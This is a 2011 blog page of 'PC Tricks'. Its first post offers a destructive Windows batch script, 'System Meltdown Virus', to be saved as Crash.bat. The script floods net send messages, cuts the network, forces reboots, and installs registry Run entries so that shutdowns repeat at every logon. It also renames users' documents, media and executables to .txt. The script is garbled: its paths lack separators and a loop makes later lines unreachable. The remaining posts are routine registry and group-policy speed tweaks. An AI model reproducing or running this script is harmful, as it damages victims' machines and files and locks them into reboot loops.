Showing posts with label PC Tricks. Show all posts
Showing posts with label PC Tricks. Show all posts

Tuesday, 21 June 2011

SYSTEM MELTDOWN VIRUS


System Meltdown
(save as Crash.bat)


:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED *****
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


PAUSE

MAXIMIZATION OF INTERNET


Maximization of internet bandwidth


1. Log off first.
2. Login again as Administrator
3. Start > Run > gpedit.msc


4. Computer Configuration > Administrative Templates > Network >
QoS Packet Scheduler
5. Limit Reservable Bandwidth > Enable > Value set to 0 > Apply








Maximization of internet surfing speed


HKEY_LOCAL_MACHINE/Software/Mcft/Windows/
CurrentVersion/Explorer/RemoteComputer/NameSpace


Delete the below value key:
{D6277990-4C6A-11CF-8D87-00AA0060F5BF}

Sunday, 15 May 2011

FASTER SHUTDOWN

When a user shuts down Windows XP, first the system has to kill all services
currently running. Every once in a while the service does not shut down
instantly and windows gives it a change to shut down on its own before it kills it.
This amount of time that windows waits is stored in the system registry.
If you modify this setting, then windows will kill the service earlier. To modify
the setting, follow the directions below:
Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000(200 would be good)

Discussion Board

Followers